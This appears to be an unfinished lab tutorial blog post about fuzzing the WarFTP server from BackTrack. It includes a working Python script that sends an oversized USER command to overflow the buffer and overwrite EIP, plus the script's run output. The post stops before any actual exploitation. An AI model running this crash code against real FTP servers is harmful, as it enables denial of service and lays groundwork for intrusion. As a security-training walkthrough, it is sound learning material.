1. Dowload WarFTP
2. Download ollyDbg
3. Fuzzer
if already prepared all the needs now install WarFTP an ollyDbg on your windows.
first steep
Open your FTP Server and press
propertis - start service
now we try to connect using nc from our backtrack
open your terminal and type : nc 192.168.43.2 21
192.168.43.2 this is ip on windows, 21 this is default FTP Server port.
if any respot from FTP Server and we were told to enter a username it's meas connected. like the picture below
now we make fuzzer for making crash by using python program.
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer= "\x41" * 1000
s.connect (('192.168.43.2 ',21))
data = s.recv (1024)
print("Sendingevildatavia USER command...")
s.send ('USER '+buffer+'\r\n')
data = s.recv (1024)
s.send(' PASS PASSWORD '+'\r\n')
s.close()
print (" Finish ")
save it's by using xfuzzy.py. and put it on home
it's time for making crash
type on your backtrack python xfuzzy.py and press enter
FTP Server it's be lose when you press enter becaus it's buffer over flow his EIP.
than now we must remove a file FtpDaemon.DAT so now we run FTP Server one more for making user nama and password on User Security Properties.
oke and it's will make a new user.
we don't now how crash, and than we try to see process of crash.open your ollyDbg.
propertis - start service
root@bt:~# python xfuzzy.py
Sendingevildatavia USER command...Finish
to be continue
@keep smile & spirit
be fun
Tidak ada komentar:
Posting Komentar